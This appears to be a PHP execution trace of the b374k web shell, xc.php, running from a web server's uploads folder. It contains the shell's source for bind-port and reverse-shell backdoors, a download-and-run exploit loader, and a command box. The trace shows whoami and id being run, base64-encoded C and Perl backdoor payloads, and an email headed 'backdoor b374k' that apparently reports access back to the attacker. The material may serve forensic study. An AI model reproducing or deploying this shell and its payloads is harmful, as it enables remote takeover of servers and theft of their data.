if(eregi("$p2 bdp $port",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; } else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; } } elseif (isset($_POST[\'backconn\']) && !empty($_POST[\'backport\']) && !empty($_POST[\'ip\']) && ($_POST[\'use\'] == \'C\')) { $ip = trim($_POST[\'ip\']); $port = trim($_POST[\'backport\']); tulis("bcc.c",$back_connect_c); exe("gcc -o bcc bcc.c"); exe("chmod 777 bcc"); @unlink("bcc.c"); exe("./bcc ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." ..."; } elseif (isset($_POST[\'backconn\']) && !empty($_POST[\'backport\']) && !empty($_POST[\'ip\']) && ($_POST[\'use\'] == \'Perl\')) { $ip = trim($_POST[\'ip\']); $port = trim($_POST[\'backport\']); tulis("bcp",$back_connect); exe("chmod +x bcp"); $p2=which("perl"); exe($p2." bcp ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." ..."; } elseif (isset($_POST[\'expcompile\']) && !empty($_POST[\'wurl\']) && !empty($_POST[\'wcmd\'])) { $pilihan = trim($_POST[\'pilihan\']); $wurl = trim($_POST[\'wurl\']); $namafile = download($pilihan,$wurl); if(is_file($namafile)) { $msg = exe($wcmd); } else $msg = "error: file not found $namafile"; } ?> <table class="tabnet"> <tr><th>Port Binding</th><th>Connect Back</th><th>Load and Exploit</th></tr> <tr> <td> <table> <form method="post" actions="?y=<?php echo $pwd; ?>&x=netsploit"> <tr><td>Port</td><td><input class="inputz" type="text" name="port" size="26" value="<?php echo $bindport ?>"></td></tr> <tr><td>Password</td><td><input class="inputz" type="text" name="bind_pass" size="26" value="<?php echo $bindport_pass; ?>"></td></tr> <tr><td>Use</td><td style="text-align:justify"><p><select class="inputz" size="1" name="use"><option value="Perl">Perl</option><option value="C">C</option></select> <input class="inputzbut" type="submit" name="bind" value="Bind" style="width:120px"></td></tr></form> </table> </td> <td> <table> <form method="post" actions="?y=<?php echo $pwd; ?>&x=netsploit"> <tr><td>IP</td><td><input class="inputz" type="text" name="ip" size="26" value="<?php echo ((getenv(\'REMOTE_ADDR\')) ? (getenv(\'REMOTE_ADDR\')) : ("127.0.0.1")); ?>"></td></tr> <tr><td>Port</td><td><input class="inputz" type="text" name="backport" size="26" value="<?php echo $bindport; ?>"></td></tr> <tr><td>Use</td><td style="text-align:justify"><p><select size="1" class="inputz" name="use"><option value="Perl">Perl</option><option value="C">C</option></select> <input type="submit" name="backconn" value="Connect" class="inputzbut" style="width:120px"></td></tr></form> </table> </td> <td> <table> <form method="post" actions="?y=<?php echo $pwd; ?>&x=netsploit"> <tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="www.some-code/exploits.c"></td></tr> <tr><td>cmd</td><td><input class="inputz" type="text" name="wcmd" style="width:250px;" value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"></td> </tr> <tr><td><select size="1" class="inputz" name="pilihan"> <option value="wwget">wget</option> <option value="wlynx">lynx</option> <option value="wfread">fread</option> <option value="wfetch">fetch</option> <option value="wlinks">links</option> <option value="wget">GET</option> <option value="wcurl">curl</option> </select></td><td colspan="2"><input type="submit" name="expcompile" class="inputzbut" value="Go" style="width:246px;"></td></tr></form> </table> </td> </tr> </table> <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div> <?php } elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'shell\')){ ?> <form action="?y=<?php echo $pwd; ?>&x=shell" method="post"> <table class="cmdbox"> <tr><td colspan="2"> <textarea class="output" readonly> <?php if(isset($_POST[\'submitcmd\'])) { echo @exe($_POST[\'cmd\']); } ?> </textarea> <tr><td colspan="2"><?php echo $prompt; ?><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:12%;" /></td></tr> </table> </form> <?php } else { if(isset($_GET[\'delete\']) && ($_GET[\'delete\'] != "")){ $file = $_GET[\'delete\']; @unlink($file); } elseif(isset($_GET[\'fdelete\']) && ($_GET[\'fdelete\'] != "")){ @rmdir(rtrim($_GET[\'fdelete\'],DIRECTORY_SEPARATOR)); } elseif(isset($_GET[\'mkdir\']) && ($_GET[\'mkdir\'] != "")){ $path = $pwd.$_GET[\'mkdir\']; @mkdir($path); } $buff = showdir($pwd,$prompt); echo $buff; } ?> </div> </body> </html> ' /var/www/html/uploads/xc.php 194 0
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $ver = '1.01'
3 9 0 0.003064 692624 getenv 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 'SERVER_SOFTWARE'
3 9 1 0.003082 692704
3 9 R 'Apache/2.4.52 (Ubuntu)'
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $software = 'Apache/2.4.52 (Ubuntu)'
3 10 0 0.003110 692672 ini_get 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 'safe_mode'
3 10 1 0.003125 692704
3 10 R FALSE
3 11 0 0.003139 692672 ini_get 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 'safe_mode'
3 11 1 0.003153 692704
3 11 R FALSE
3 12 0 0.003166 692672 strtolower 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 FALSE
3 12 1 0.003181 692704
3 12 R ''
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $safemode = FALSE
3 13 0 0.003206 692672 php_uname 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 0
3 13 1 0.003221 692784
3 13 R 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $system = 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
3 14 0 0.003256 692784 substr 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 3 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64' 0 3
3 14 1 0.003274 692912
3 14 R 'Lin'
3 15 0 0.003287 692816 strtolower 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 'Lin'
3 15 1 0.003300 692880
3 15 R 'lin'
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $win = FALSE
3 16 0 0.003326 692784 exe 1 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 'whoami'
4 17 0 0.003340 692784 function_exists 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 'system'
4 17 1 0.003353 692824
4 17 R TRUE
4 18 0 0.003366 692784 ob_start 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 0
4 18 1 0.003380 709296
4 18 R TRUE
4 19 0 0.003393 709296 system 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 'whoami'
4 19 1 0.005586 709368
4 19 R 'www-data'
4 20 0 0.005617 709296 ob_get_contents 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 0
4 20 1 0.005633 709336
4 20 R 'www-data\n'
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $buff = 'www-data\n'
4 21 0 0.005662 709336 ob_end_clean 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 0
4 21 1 0.005676 692824
4 21 R TRUE
3 16 1 0.005690 692824
3 16 R 'www-data\n'
3 22 0 0.005704 692824 rapih 1 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 'www-data\n'
4 23 0 0.005720 692824 str_replace 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 3 '<br />' '' 'www-data\n'
4 23 1 0.005744 692920
4 23 R 'www-data\n'
4 24 0 0.005759 692824 trim 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 'www-data\n'
4 24 1 0.005773 692896
4 24 R 'www-data'
3 22 1 0.005786 692864
3 22 R 'www-data'
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $user = 'www-data'
3 25 0 0.005813 692824 exe 1 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 'id'
4 26 0 0.005826 692824 function_exists 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 'system'
4 26 1 0.005841 692864
4 26 R TRUE
4 27 0 0.005853 692824 ob_start 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 0
4 27 1 0.005867 709336
4 27 R TRUE
4 28 0 0.005880 709336 system 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 'id'
4 28 1 0.007317 709448
4 28 R 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
4 29 0 0.007355 709336 ob_get_contents 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 0
4 29 1 0.007370 709416
4 29 R 'uid=33(www-data) gid=33(www-data) groups=33(www-data)\n'
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $buff = 'uid=33(www-data) gid=33(www-data) groups=33(www-data)\n'
4 30 0 0.007403 709416 ob_end_clean 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 0
4 30 1 0.007418 692904
4 30 R TRUE
3 25 1 0.007432 692904
3 25 R 'uid=33(www-data) gid=33(www-data) groups=33(www-data)\n'
3 31 0 0.007448 692904 rapih 1 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 'uid=33(www-data) gid=33(www-data) groups=33(www-data)\n'
4 32 0 0.007464 692904 str_replace 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 3 '<br />' '' 'uid=33(www-data) gid=33(www-data) groups=33(www-data)\n'
4 32 1 0.007483 693000
4 32 R 'uid=33(www-data) gid=33(www-data) groups=33(www-data)\n'
4 33 0 0.007499 692904 trim 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 'uid=33(www-data) gid=33(www-data) groups=33(www-data)\n'
4 33 1 0.007514 693016
4 33 R 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
3 31 1 0.007529 692984
3 31 R 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $id = 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $prompt = 'www-data $ '
3 34 0 0.007570 692944 getcwd 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 0
3 34 1 0.007585 692992
3 34 R '/var/www/html/uploads'
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $pwd = '/var/www/html/uploads/'
3 35 0 0.007621 692992 function_exists 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 'posix_getpwuid'
3 35 1 0.007643 693032
3 35 R TRUE
3 36 0 0.007659 692992 function_exists 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 'posix_getgrgid'
3 36 1 0.007676 693032
3 36 R TRUE
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $posix = TRUE
3 37 0 0.007701 692992 gethostbyname 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 'localhost'
3 37 1 0.007743 693072
3 37 R '127.0.0.1'
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $server_ip = '127.0.0.1'
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $my_ip = '127.0.0.1'
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $bindport = '13123'
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $bindport_pass = 'b374k'
3 38 0 0.007805 693032 explode 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 2 '/' '/var/www/html/uploads/'
3 38 1 0.007822 693640
3 38 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $pwds = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $pwdurl = ''
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $i = 0
3 39 0 0.007881 693568 sizeof 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
3 39 1 0.007899 693600
3 39 R 6
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $pathz = ''
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $j = 0
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $pathz .= '/'
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $pwdurl .= '<a href="?y=/"> / </a>'
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $i++
3 40 0 0.007990 693648 sizeof 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
3 40 1 0.008008 693680
3 40 R 6
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $pathz = ''
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $j = 0
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $pathz .= '/'
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $pathz .= 'var/'
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $pwdurl .= '<a href="?y=/var/">var / </a>'
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $i++
3 41 0 0.008101 693680 sizeof 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
3 41 1 0.008119 693712
3 41 R 6
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $pathz = ''
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $j = 0
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $pathz .= '/'
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $pathz .= 'var/'
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $pathz .= 'www/'
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $pwdurl .= '<a href="?y=/var/www/">www / </a>'
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $i++
3 42 0 0.008226 693720 sizeof 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
3 42 1 0.008246 693752
3 42 R 6
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $pathz = ''
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $j = 0
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $pathz .= '/'
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $pathz .= 'var/'
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $pathz .= 'www/'
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $pathz .= 'html/'
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $pwdurl .= '<a href="?y=/var/www/html/">html / </a>'
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $i++
3 43 0 0.008461 693768 sizeof 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
3 43 1 0.008485 693800
3 43 R 6
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $pathz = ''
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $j = 0
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $pathz .= '/'
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $pathz .= 'var/'
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $pathz .= 'www/'
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $pathz .= 'html/'
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $pathz .= 'uploads/'
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $j++
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $pwdurl .= '<a href="?y=/var/www/html/uploads/">uploads / </a>'
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $i++
3 44 0 0.008681 693840 sizeof 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
3 44 1 0.008703 693872
3 44 R 6
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $buff = 'Apache/2.4.52 (Ubuntu)<br />'
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $buff .= 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64<br />'
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $buff .= 'uid=33(www-data) gid=33(www-data) groups=33(www-data)<br />'
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $buff .= 'server ip : 127.0.0.1 <span class="gaya">|</span> your ip : 127.0.0.1<br />'
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $buff .= 'safemode <span class="gaya">OFF<span><br />'
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $buff .= ' > <a href="?y=/"> / </a><a href="?y=/var/">var / </a><a href="?y=/var/www/">www / </a><a href="?y=/var/www/html/">html / </a><a href="?y=/var/www/html/uploads/">uploads / </a>'
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $port_bind_bd_c = 'bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07'
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $port_bind_bd_pl = 'ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1 NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8='
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $back_connect = 'fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw=='
2 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $back_connect_c = 'XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75 i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw'
3 45 0 0.008921 694352 showdir 1 /var/www/html/uploads/xc.php(194) : eval()'d code 2 2 '/var/www/html/uploads/' 'www-data $ '
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $fname = []
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $dname = []
4 46 0 0.008960 694352 function_exists 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 'posix_getpwuid'
4 46 1 0.008974 694392
4 46 R TRUE
4 47 0 0.008988 694352 function_exists 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 'posix_getgrgid'
4 47 1 0.009002 694392
4 47 R TRUE
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $posix = TRUE
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $user = '????:????'
4 48 0 0.009037 694352 opendir 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 '/var/www/html/uploads/'
4 48 1 0.009064 694744
4 48 R resource(6) of type (stream)
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $dh = resource(6) of type (stream)
4 49 0 0.009098 694712 readdir 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 resource(6) of type (stream)
4 49 1 0.009127 694784
4 49 R 'xc.php'
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $file = 'xc.php'
4 50 0 0.009153 694744 is_dir 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 'xc.php'
4 50 1 0.009172 694792
4 50 R FALSE
4 51 0 0.009186 694752 is_file 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 'xc.php'
4 51 1 0.009200 694792
4 51 R TRUE
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $fname[] = 'xc.php'
4 52 0 0.009226 695128 readdir 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 resource(6) of type (stream)
4 52 1 0.009241 695200
4 52 R '..'
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $file = '..'
4 53 0 0.009265 695160 is_dir 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 '..'
4 53 1 0.009280 695200
4 53 R TRUE
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $dname[] = '..'
4 54 0 0.009304 695536 readdir 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 resource(6) of type (stream)
4 54 1 0.009318 695608
4 54 R '.'
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $file = '.'
4 55 0 0.009341 695568 is_dir 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 '.'
4 55 1 0.009356 695608
4 55 R TRUE
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $dname[] = '.'
4 56 0 0.009379 695568 readdir 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 resource(6) of type (stream)
4 56 1 0.009393 695648
4 56 R 'prepend.php'
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $file = 'prepend.php'
4 57 0 0.009417 695608 is_dir 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 'prepend.php'
4 57 1 0.009433 695656
4 57 R FALSE
4 58 0 0.009446 695616 is_file 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 'prepend.php'
4 58 1 0.009460 695656
4 58 R TRUE
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $fname[] = 'prepend.php'
4 59 0 0.009483 695616 readdir 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 resource(6) of type (stream)
4 59 1 0.009497 695688
4 59 R 'data'
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $file = 'data'
4 60 0 0.009520 695648 is_dir 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 'data'
4 60 1 0.009535 695680
4 60 R TRUE
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $dname[] = 'data'
4 61 0 0.009559 695640 readdir 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 resource(6) of type (stream)
4 61 1 0.009573 695720
4 61 R '.htaccess'
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $file = '.htaccess'
4 62 0 0.009598 695680 is_dir 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 '.htaccess'
4 62 1 0.009613 695728
4 62 R FALSE
4 63 0 0.009626 695688 is_file 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 '.htaccess'
4 63 1 0.009640 695728
4 63 R TRUE
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $fname[] = '.htaccess'
4 64 0 0.009664 695688 readdir 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 resource(6) of type (stream)
4 64 1 0.009678 695728
4 64 R FALSE
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $file = FALSE
4 65 0 0.009702 695688 closedir 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 resource(6) of type (stream)
4 65 1 0.009720 695504
4 65 R NULL
4 66 0 0.009734 695488 sort 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 [0 => 'xc.php', 1 => 'prepend.php', 2 => '.htaccess']
4 66 1 0.009753 695520
4 66 R TRUE
4 67 0 0.009766 695512 sort 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 [0 => '..', 1 => '.', 2 => 'data']
4 67 1 0.009781 695544
4 67 R TRUE
4 68 0 0.009794 695512 explode 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 2 '/' '/var/www/html/uploads/'
4 68 1 0.009814 696120
4 68 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $path = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
4 69 0 0.009850 696048 sizeof 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads', 5 => '']
4 69 1 0.009868 696080
4 69 R 6
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $tree = 6
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $parent = ''
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $buff = ' <form action="?y=/var/www/html/uploads/&x=shell" method="post" style="margin:8px 0 0 0;"> <table class="cmdbox" style="width:50%;"> <tr><td>www-data $ </td><td><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:400px;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:80px;" /></td></tr> </form> <form action="?" method="get" style="margin:8px 0 0 0;"> <input type="hidden" name="y" value="/var/www/html/uploads/" /> <t'
4 70 0 0.009930 697328 error_reporting 0 /var/www/html/uploads/xc.php(194) : eval()'d code 2 1 0
4 70 1 0.009944 697368
4 70 R 0
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $sub = 'backdoor b374k'
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $headers = 'From: k3nz0 \n'
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $headers .= 'Content-Type: text/plain; charset=iso-8859-1\n'
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $mes .= 'username: ????:????\n'
3 A /var/www/html/uploads/xc.php(194) : eval()'d code 2 $mes .= 'password: \n'
